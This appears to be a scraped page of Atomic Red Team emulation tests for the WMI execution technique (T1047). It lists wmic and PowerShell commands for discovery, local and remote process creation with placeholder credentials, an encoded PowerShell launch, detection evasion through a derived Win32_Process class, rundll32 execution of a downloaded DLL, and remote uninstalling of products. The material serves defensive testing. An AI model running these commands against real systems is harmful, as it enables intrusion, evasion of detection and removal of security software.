Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6) **Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)
Atomic Test #7 - Create a Process using WMI Query and an Encoded Command
Atomic Test #8 - Create a Process using obfuscated Win32_Process
An adversary might use WMI to list all local User Accounts. When the test completes , there should be local user accounts information displayed on the command line.
Supported Platforms: Windows
auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea
1
command_prompt
!wmic useraccount get /ALL /format:csv
An adversary might use WMI to list Processes running on the compromised host. When the test completes , there should be running processes listed on the command line.
Supported Platforms: Windows
auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
1
command_prompt
!wmic process get caption,executablepath,commandline /format:csv
An adversary might use WMI to list installed Software hotfix and patches. When the test completes, there should be a list of installed patches and when they were installed.
Supported Platforms: Windows
auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
1
command_prompt
!wmic qfe get description,installedOn /format:csv
An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that “No instance(s) Available” if the service queried is not running. A common error message is “Node - (provided IP or default) ERROR Description =The RPC server is unavailable” if the provided remote host is unreachable
Supported Platforms: Windows
auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
| Name | Description | Type | Default Value | |——|————-|——|—————| | node | Ip Address | string | 127.0.0.1| | service_search_string | Name Of Service | string | Spooler|
1
command_prompt
!wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
This test uses wmic.exe to execute a process on the local host. When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.
Supported Platforms: Windows
auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
| Name | Description | Type | Default Value | |——|————-|——|—————| | process_to_execute | Name or path of process to execute. | string | notepad.exe|
1
command_prompt
!wmic process call create #{process_to_execute}
wmic process where name='#{process_to_execute}' delete >nul 2>&1
This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. To clean up, provide the same node input as the one provided to run the test A common error message is “Node - (provided IP or default) ERROR Description =The RPC server is unavailable” if the default or provided IP is unreachable
Supported Platforms: Windows
auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
| Name | Description | Type | Default Value | |——|————-|——|—————| | node | Ip Address | string | 127.0.0.1| | user_name | Username | string | DOMAIN\Administrator| | password | Password | string | P@ssw0rd1| | process_to_execute | Name or path of process to execute. | string | notepad.exe|
1
command_prompt
!wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand
Powershell -nop -exec bypass -EncodedCommand
Supported Platforms: Windows
auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
1
command_prompt
!powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic. Cybereason blog post No Win32_ProcessNeeded
Supported Platforms: Windows
auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
| Name | Description | Type | Default Value | |——|————-|——|—————| | new_class | Derived class name | string | Win32_Atomic| | process_to_execute | Name or path of process to execute. | string | notepad.exe|
1
powershell
! Elevation Required (e.g. root or admin)1
2
3
4
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
1
2
$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
try { $CleanupClass.Delete() } catch {}
This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
Supported Platforms: Windows
auto_generated_guid: 00738d2a-4651-4d76-adf2-c43a41dfb243
| Name | Description | Type | Default Value | |——|————-|——|—————| | node | Ip Address | string | 127.0.0.1| | dll_to_execute | Path to DLL. | string | PathToAtomicsFolder\..\ExternalPayloads\calc.dll| | function_to_execute | Name of DLL function to call | string | StartW|
1
command_prompt
!wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
taskkill /f /im calculator.exe
1
powershell
!1
if (Test-Path "#{dll_to_execute}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}"
Emulates uninstalling applications using WMIC. This method only works if the product was installed with an msi file. APTs have been seen using this to uninstall security products.
Supported Platforms: Windows
auto_generated_guid: c510d25b-1667-467d-8331-a56d3e9bc4ff
| Name | Description | Type | Default Value | |——|————-|——|—————| | node | Computer the action is being executed against but defaults to the localhost. | string | 127.0.0.1| | product | Enter the product name being uninstalled. This will default to TightVNC. | string | Tightvnc|
1
command_prompt
! Elevation Required (e.g. root or admin)wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
1
powershell
!1
if ((Test-Path "C:\Program Files\TightVNC\tvnviewer.exe")-Or (Test-Path "C:\Program Files (x86)\TightVNC\tvnviewer.exe")) {exit 0} else {exit 1}
1
2
3
4
Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi"
start-sleep -s 10
msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
start-sleep -s 15